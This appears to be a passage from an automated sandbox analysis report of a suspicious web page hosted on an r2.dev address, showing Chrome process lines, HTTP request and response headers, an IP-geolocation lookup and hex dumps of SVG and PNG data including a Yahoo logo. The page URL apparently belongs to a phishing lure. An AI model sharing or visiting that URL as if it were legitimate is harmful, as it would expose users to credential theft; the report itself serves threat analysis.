                      2024-07-04 22:30:28 UTC1369INData Raw: 34 34 20 31 33 33 2e 30 32 20 31 34 36 2e 36 31 31 20 31 33 37 2e 34 31 32 20 31 34 36 2e 36 31 31 20 31 34 32 2e 38 33 31 43 31 34 36 2e 36 31 31 20 31 34 38 2e 32 34 39 20 31 34 32 2e 33 34 34 20 31 35 32 2e 36 34 31 20 31 33 37 2e 30 38 31 20 31 35 32 2e 36 34 31 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 43 35 45 42 46 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 20 73 74 79 6c 65 3d 22 6d 69 78 2d 62 6c 65 6e 64 2d 6d 6f 64 65 3a 20 6d 75 6c 74 69 70 6c 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 30 37 34 20 31 34 32 2e 38 33 31 43 31 30 33 2e 30
                      Data Ascii: 44 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.0
                      2024-07-04 22:30:28 UTC1369INData Raw: 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 31 32 39 2e 38 35 32 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37
                      Data Ascii: d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44975134.117.186.1924438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:28 UTC661OUTGET /json?token=5eaf0700b2c0d2 HTTP/1.1
                      Host: ipinfo.io
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      Accept: application/json, text/javascript, */*; q=0.01
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Origin: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC513INHTTP/1.1 200 OK
                      server: nginx/1.24.0
                      date: Thu, 04 Jul 2024 22:30:28 GMT
                      content-type: application/json; charset=utf-8
                      Content-Length: 274
                      access-control-allow-origin: *
                      x-frame-options: SAMEORIGIN
                      x-xss-protection: 1; mode=block
                      x-content-type-options: nosniff
                      referrer-policy: strict-origin-when-cross-origin
                      x-envoy-upstream-service-time: 3
                      via: 1.1 google
                      strict-transport-security: max-age=2592000; includeSubDomains
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-07-04 22:30:28 UTC274INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                      Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.449752104.26.6.174438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:28 UTC383OUTGET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1
                      Host: logodownload.org
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:28 UTC637INHTTP/1.1 200 OK
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Type: image/png
                      Content-Length: 57304
                      Connection: close
                      Last-Modified: Wed, 12 Aug 2020 20:27:15 GMT
                      Cache-Control: max-age=31536000
                      CF-Cache-Status: HIT
                      Age: 43927
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGynlNwmc5VYHG1s2x9Svbff5Ru%2Fcg0ovYoPbishQlU%2Fzuc3dVOxBCHp1JCSd10Tg7GdfgklJLCmLCgfVeKNAwE%2BRz6BxXOttlk09hn%2FrMt%2FPviX1FrhccF4KjqwehtbaSM%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 89e28f5dcfab8c71-EWR
                      2024-07-04 22:30:28 UTC732INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 02 57 08 06 00 00 00 f1 15 31 a9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 08 f8 00 00 08 f8 01 f2 3d f9 ba 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 7b 94 5c 05 99 ef fd df b3 ab 3b 97 0e d7 04 04 e4 12 40 ee 21 e9 10 a2 c8 65 34 0a 08 3a 20 2a 36 02 a1 ab 2a 1d 68 34 4c d4 39 c7 b3 3c 33 67 d6 31 67 cd bc 33 bc 33 ef bc a3 03 12 08 04 3a 09 20 26 28 a3 20 20 02 41 84 70 b1 ed ee aa a6 b9 0b 72 53 f1 16 0c 10 48 ba 7b 3f e7 8f 04 87 c1 00 dd 49 75 3d b5 ab be 9f b5 58 2b e9 74 57 7d 59 2b ab 53 5d fb b7 f7 36 01 00 00 00 68 78 79 f5 9d 62 66 37 46 77
                      Data Ascii: PNGIHDRpW1sBIT|dpHYs=tEXtSoftwarewww.inkscape.org< IDATx{\;@!e4: *6*h4L9<3g1g33: &( AprSH{?Iu=X+tW}Y+S]6hxybf7Fw
                      2024-07-04 22:30:28 UTC1369INData Raw: 4a 1d f2 f2 96 fe 88 01 07 00 00 00 00 00 00 00 00 00 00 00 5b 6d f0 3c 49 e3 a2 2b 90 11 a9 2f 79 bb 3f 6a aa 66 07 00 00 00 00 00 00 00 00 00 00 00 f5 62 8e 56 37 b9 59 67 74 07 b2 c1 a5 3b 97 6b e6 c0 db fd 39 57 e0 00 00 00 00 00 00 00 00 00 00 00 60 2b ec ab 9d 3f 29 69 af e8 0e 64 84 6b f1 3b fd 31 03 0e 00 00 00 00 00 00 00 00 00 00 00 b6 82 9b 2d 88 6e 40 56 d8 af 26 68 f0 7b ef f4 19 0c 38 00 00 00 00 00 00 00 00 00 00 00 18 a5 a2 ca 87 48 fa 68 74 07 b2 c1 dd 2f 5b a2 d9 83 ef f4 39 0c 38 00 00 00 00 00 00 00 00 00 00 00 18 a5 34 d1 02 49 16 dd 81 4c 18 92 fc 8a 77 fb 24 06 1c 00 00 00 00 00 00 00 00 00 00 00 8c 42 a7 ba 5b cc fd 9c e8 0e 64 84 e9 86 e5 9a f9 c2 bb 7d 1a 03 0e 00 00 00 00 00 00 00 00 00 00 00 46 e1 75 35 b5 4b da 39 ba 03 d9 e0
                      Data Ascii: J[m<I+/y?jfbV7Ygt;k9W`+?)idk;1-n@V&h{8Hht/[984ILw$B[d}Fu5K9
                      2024-07-04 22:30:28 UTC1369INData Raw: 26 cd 95 34 39 ba 03 d9 60 6e 8b c7 fa 39 18 70 00 00 00 00 00 00 00 00 00 00 00 1a 8e 99 3e 1f dd 80 ac b0 5f 8d d3 c6 ff 18 eb 67 61 c0 01 00 00 00 00 00 00 00 00 00 00 68 28 79 95 8f 96 74 64 74 07 b2 c1 dc 97 2c d1 ec c1 b1 7e 1e 06 1c 00 00 00 00 00 00 00 00 00 00 80 86 62 89 16 44 37 20 33 86 06 a5 2b aa f1 44 0c 38 00 00 00 00 00 00 00 00 00 00 00 0d e3 2c 75 ef 22 f7 cf 46 77 20 33 fe e3 1a b5 3e 5f 8d 27 62 c0 01 00 00 00 00 00 00 00 00 00 00 68 18 e3 d5 74 ae a4 09 d1 1d c8 86 c4 b5 b8 6a cf 55 ad 27 02 00 00 00 00 00 00 00 00 00 00 20 d2 22 79 e2 66 9d d1 1d c8 8c 47 af d2 8c d5 d5 7a 32 06 1c 00 00 00 00 00 00 00 00 00 00 80 86 f0 b4 ca a7 48 da 2f ba 03 19 e1 5a 2c 99 57 eb e9 18 70 00 00 00 00 00 00 00 00 00 00 00 1a 82 99 16 44 37 20 33 d6
                      Data Ascii: &49`n9p>_gah(ytdt,~bD7 3+D8,u"Fw 3>_'bhtjU' "yfGz2H/Z,WpD7 3
                      2024-07-04 22:30:28 UTC1369INData Raw: 0c 37 2d 88 6e 40 66 0c 0d a5 7e 79 74 c4 48 31 e0 00 00 00 00 00 00 00 00 00 00 00 64 c2 7c f5 4c 95 fc e4 e8 0e 64 83 4b df bf 46 ad cf 47 77 8c 14 03 0e 00 00 00 00 00 00 00 00 00 00 40 26 0c 25 c9 02 49 b9 e8 0e 64 83 b9 2e 89 6e 18 0d 06 1c 00 00 00 00 00 00 00 00 00 00 80 9a b7 50 4f 8c 97 5b 31 ba 03 99 f1 c4 32 cd b8 33 3a 62 34 18 70 00 00 00 00 00 00 00 00 00 00 00 6a de 1f b5 fe 4c 49 ef 89 ee 40 36 b8 eb 9b 92 79 74 c7 68 30 e0 00 00 00 00 00 00 00 00 00 00 00 d4 3c 33 2d 88 6e 40 66 ac 1f 92 2d 8f 8e 18 2d 06 1c 00 00 00 00 00 00 00 00 00 00 80 9a 96 57 df 11 92 3e 10 dd 81 6c 70 d3 35 d7 6a c6 da e8 8e d1 62 c0 01 00 00 00 00 00 00 00 00 00 00 a8 69 96 68 61 74 03 b2 c3 52 bb 2c ba 61 6b 30 e0 00 00 00 00 00 00 00 00 00 00 00 d4 ac b3 55 de
                      Data Ascii: 7-n@f~ytH1d|LdKFGw@&%Id.nPO[123:b4pjLI@6yth0<3-n@f--W>lp5jbihatR,ak0U
                      2024-07-04 22:30:28 UTC1369INData Raw: 8e 92 24 f7 66 c9 b6 fb f3 47 b4 97 65 3e b4 e9 d7 fe aa a4 8d 92 64 d2 5a a5 7a 49 d2 4b a9 b4 d6 a5 97 36 7d 4f f7 b5 2e 7b 69 a2 06 d7 2e d1 ec c1 b1 ff 3f 06 d0 a8 0a 2a 9d 28 d9 41 d1 1d c8 08 f3 e5 d7 f8 07 d7 45 67 8c 35 8b 0e 00 00 00 d5 d5 ae d2 a4 66 e5 0e 18 d6 f0 01 26 3f d0 13 3b c0 5c 07 b8 7c 4f c9 76 97 b4 85 1f f4 ab e6 f7 92 9e 73 e9 29 99 7e ae d4 7f 9e 28 f7 54 4e 83 8f 2f d5 ac 67 02 bb 80 ba 97 57 df 29 66 76 63 74 07 2a 6a ed 32 6f 9d 1c 1d 11 6d be 06 26 0f 6a f8 e0 44 3a 58 89 1f e8 d2 81 72 1d 20 69 4f 49 ef a9 72 ce 06 c9 9f 93 ec 19 99 3f eb a9 3d 23 f9 cf 73 b2 87 5d 3b 3c dc a5 fd 5e af 72 0f 80 8c 58 a8 27 c6 af d5 c6 bd 73 1a 9a 6a f2 a9 92 ed e3 89 f6 33 d7 54 df f4 bd 6c 8a a4 c9 aa 9d 93 b5 06 25 fd da e5 cf 99 d9 0b 92
                      Data Ascii: $fGe>dZzIK6}O.{i.?*(AEg5f&?;\|Ovs)~(TN/gW)fvct*j2om&jD:Xr iOIr?=#s];<^rX'sj3Tl%
                      2024-07-04 22:30:28 UTC1369INData Raw: a9 fc d1 15 6a 7d 35 ba 23 eb 3a d5 dd b2 41 cd 1f 57 a2 d3 e5 f6 97 92 ef 10 dd 54 c7 7e e7 a6 1b 92 54 2b ba 34 e3 9e 2c 9d a9 37 4f a5 59 a9 8c 37 91 32 6a bc 36 96 97 68 f6 60 74 c7 5b 31 e0 a8 4b 99 1a 70 14 35 b0 bb 6b e8 1c 99 e6 4a 9a 19 dd 93 75 2e 2f 99 27 d7 a6 f2 ae 15 6a fd 4d 74 0f 50 6f 3a 54 de 7f 48 7e aa 99 4e 91 f4 21 49 e3 a2 9b b0 45 2f ba e9 b6 24 b5 1b 07 b5 fe 87 d7 e8 83 eb a2 83 00 d4 96 76 95 f6 4b 64 27 6e be da e9 c7 24 ed 18 dd 84 2d fa d3 6d 04 73 1a ba e9 4a cd fa 65 74 10 80 ad d7 a1 87 5a 87 6d b8 2f ba 03 59 61 37 2c f3 19 9f 89 ae a8 26 cb 5b e9 07 26 7d 22 3a 04 61 ee 5d e6 ad c7 45 47 a0 be 74 a8 bc ff b0 f9 93 62 a1 de 48 5e 1a ef 83 7b 2e d1 ec f5 d1 21 59 b4 79 b4 71 9a 4c a7 4b fa b8 a4 96 e8 a6 06 f4 73 73 5f 96
                      Data Ascii: j}5#:AWT~T+4,7OY72j6h`t[1Kp5kJu./'jMtPo:TH~N!IE/$vKd'n$-msJetZm/Ya7,&[&}":a]EGtbH^{.!YyqLKss_
                      2024-07-04 22:30:28 UTC1369INData Raw: 80 a3 5d fd 87 26 96 0e 88 75 6a a3 4a 9b 7c 78 ff a5 9a f5 4c 74 08 b2 ab 90 f4 fd bd dc fe 2e ba 03 55 e4 fa db 65 6a fd a7 e8 8c 5a 31 4f 3d bb ba 72 17 b8 e9 02 49 bb 44 f7 60 cc 6d 90 f9 b2 e6 34 f7 bf af d0 f4 17 ab f9 c4 0c 38 b2 8d 01 07 aa a8 ea 03 8e 36 ad 99 d8 a2 49 5f 96 d9 ff e4 0a 8f 99 f6 ac b9 ff 5d 97 5a af e6 be e1 a8 17 f3 d4 b3 eb b0 9a 3a cc d2 73 25 3b 20 ba 07 99 e5 92 ee 92 eb f2 f5 6a fa ce 2a 4d db 18 1d 04 34 9a 36 ad 99 38 49 2d 67 b9 d9 79 92 3e 18 dd 83 4c eb 77 d7 d2 09 1a ec 5a a2 d9 7f 8c 8e 01 ea dd 3c f5 ef 9d 5a fa 94 b8 3a 27 46 e6 fe 65 de 7a 74 74 44 94 e4 8d 5f ac d0 f4 47 24 dd 19 d8 82 58 c9 b0 72 f3 a2 23 90 5d 73 b4 ba 49 6e fc 1d 6a 2c 1b 9b 95 5c 19 1d 51 0b f2 7a 64 4a 21 29 fd 4b 6a b9 67 dc f4 35 31 de 68
                      Data Ascii: ]&ujJ|xLt.UejZ1O=rID`m486I_]Z:s%; j*M468I-gy>LwZ<Z:'FezttD_G$Xr#]sInj,\QzdJ!)Kjg51h
                      2024-07-04 22:30:28 UTC1369INData Raw: 97 dc 86 1e dd 7c c9 4e be 2f 62 6b 25 72 7d 71 9d ad ff 59 41 e5 23 a3 63 00 60 b4 da b4 32 57 50 e9 7f b9 25 6b 24 3b 20 ba 07 35 a3 c9 4d 5f 9b 64 07 ff 60 be 06 26 47 c7 a0 71 b4 ab 74 54 c1 4a b7 9b d9 4f 24 7d 28 ba 07 18 89 37 86 1c 45 2b df d7 ae be 93 a2 7b 80 5a 50 54 ef be 85 a4 b4 cc cd 1f da 3c dc e0 7d 17 d4 3c 93 a6 9a e9 eb eb 6c fd 23 45 f5 75 cc d1 6a 6e f1 03 bc 83 4e 75 ef 28 b7 b9 d1 1d c8 06 97 9e 59 af 27 6e 8d ee a8 05 5b 1c 70 74 e9 88 3e 49 f7 54 b9 05 b5 e3 a0 a2 ca c7 45 47 20 1b cc 74 5e 74 03 aa ca 73 a9 2e 8d 8e 18 6b ed 2a 7f 78 aa 4d ee 35 d3 d7 25 ed 18 dd 83 ba 31 4d e6 f7 e5 55 fa db 45 f2 2d be 06 03 80 5a 53 d4 c0 ee 2d 76 c8 cd 32 fd 83 b8 ff 38 b6 c0 a5 93 86 6c a8 af 5d fd b3 a3 5b 50 df 8a ea 3d b0 60 7d 37 24 a6
                      Data Ascii: |N/bk%r}qYA#c`2WP%k$; 5M_d`&GqtTJO$}(7E+{ZPT<}<l#EujnNu(Y'n[pt>ITEG t^ts.k*xM5%1MUE-ZS-v28l][P=`}7$
                      2024-07-04 22:30:28 UTC1369INData Raw: ac 42 0b 6a 90 bb e6 76 aa bb 25 ba 03 b5 c5 b4 71 9e 24 ce 02 69 20 9e 7a 5d dc 7f ac a8 d2 c9 4d a6 5e 49 c7 45 b7 00 6f e3 40 b7 e4 ee bc fa 67 44 87 00 68 0c 79 95 4f 33 b3 db 24 ed 1c dd 82 ba b5 8f 2c bd eb 1c 0d 70 fb 45 fc 99 a2 4a 27 6f b0 e6 87 e4 d6 29 2e af 0f 6c 81 1d 20 d3 8f f2 49 69 f9 59 ea de 25 ba 06 78 3b ed 2a 1d be e9 aa 1b 7e a1 78 cf 10 d8 92 9d 65 7e 59 c1 ca 77 15 55 3e 24 3a 06 18 4b 1b d4 fc 59 49 ef 8d ee 40 46 98 ba 56 a8 f5 d5 e8 8c 5a 33 a2 33 8f cd b9 0a 47 03 db 71 f3 37 5b e0 3f 99 58 4f 36 96 81 e5 9a 79 4f 74 c4 b6 68 d3 ca 5c 51 a5 45 6e fa 81 24 de f4 42 ad db dd 2c fd f1 3c f5 1f 13 1d 02 a0 be 15 55 3a d3 cc af 97 34 31 ba 05 75 6f af 9c 0d ad 66 c4 81 37 14 d5 bb 53 21 e9 bb ca 4d b7 48 da 2b ba 07 a8 71 66 ae f6
                      Data Ascii: Bjv%q$i z]M^IEo@gDhyO3$,pEJ'o).l IiY%x;*~xe~YwU>$:KYI@FVZ33Gq7[?XO6yOth\QEn$B,<U:41uof7S!MH+qf
                      2024-07-04 22:30:28 UTC1369INData Raw: 87 6d c3 1a 49 a7 47 b7 00 0d e8 f8 d4 72 bd 79 95 8f 8e 0e 01 46 c2 4d 0b a2 1b 90 1d c3 a9 b1 35 78 17 a3 1e 70 bc a6 57 af 91 f4 fb 31 68 41 ed 4b 06 95 2b 06 37 20 40 a7 ba 77 94 db 19 d1 1d a8 1e 77 bf 2c 2b f7 1f 2b aa f7 fd 6e 7e a7 a4 f7 46 b7 00 d5 61 27 4a 6a 8e ae 00 90 09 d6 64 2d 5d 92 0e 89 0e 01 de 89 99 2e 2d aa f7 fd d1 1d d8 76 79 95 ce 95 25 77 4a 7a 4f 74 0b d0 c0 8e 74 4b ba db d5 77 52 74 08 b2 eb 4d 63 bc c3 a3 5b 80 06 b6 a7 99 df 9d 57 f9 ab d1 21 c0 3b e9 50 cf 7b 4d 3a 35 ba 03 99 f1 c8 0a 4d bf 3b 3a a2 d6 8d 7a c0 b1 4a c7 bc e6 a6 2b c7 22 06 b5 cf 4c f3 b9 47 71 e3 79 5d cd 73 25 4d 8a ee 40 d5 0c 49 7e 45 74 c4 48 e4 d5 f7 11 b7 e4 0e 49 bb 44 b7 00 00 50 83 76 92 fc d3 d1 11 c0 08 4c 70 cb 7d af 43 3d 0c 72 33 aa 4d 2b 73
                      Data Ascii: mIGryFM5xpW1hAK+7 @ww,++n~Fa'Jjd-].-vy%wJzOttKwRtMc[W!;P{M:5M;:zJ+"LGqy]s%M@I~EtHIDPvLp}C=r3M+s


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.449749184.28.90.27443
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:28 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-07-04 22:30:28 UTC514INHTTP/1.1 200 OK
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      Content-Type: application/octet-stream
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      Server: ECAcc (lpl/EF06)
                      X-CID: 11
                      X-Ms-ApiVersion: Distribute 1.2
                      X-Ms-Region: prod-weu-z1
                      Cache-Control: public, max-age=30835
                      Date: Thu, 04 Jul 2024 22:30:28 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-07-04 22:30:28 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44975334.117.186.1924438C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-07-04 22:30:29 UTC358OUTGET /json?token=5eaf0700b2c0d2 HTTP/1.1
                      Host: ipinfo.io
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-07-04 22:30:29 UTC513INHTTP/1.1 200 OK
                      server: nginx/1.24.0
                      date: Thu, 04 Jul 2024 22:30:29 GMT
                      content-type: application/json; charset=utf-8
                      Content-Length: 274
                      access-control-allow-origin: *
                      x-frame-options: SAMEORIGIN
                      x-xss-protection: 1; mode=block
                      x-content-type-options: nosniff
                      referrer-policy: strict-origin-when-cross-origin
                      x-envoy-upstream-service-time: 2
                      via: 1.1 google
                      strict-transport-security: max-age=2592000; includeSubDomains
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-07-04 22:30:29 UTC274INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                      Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:18:30:15
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:2
                      Start time:18:30:21
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:3
                      Start time:18:30:22
                      Start date:04/07/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      No disassembly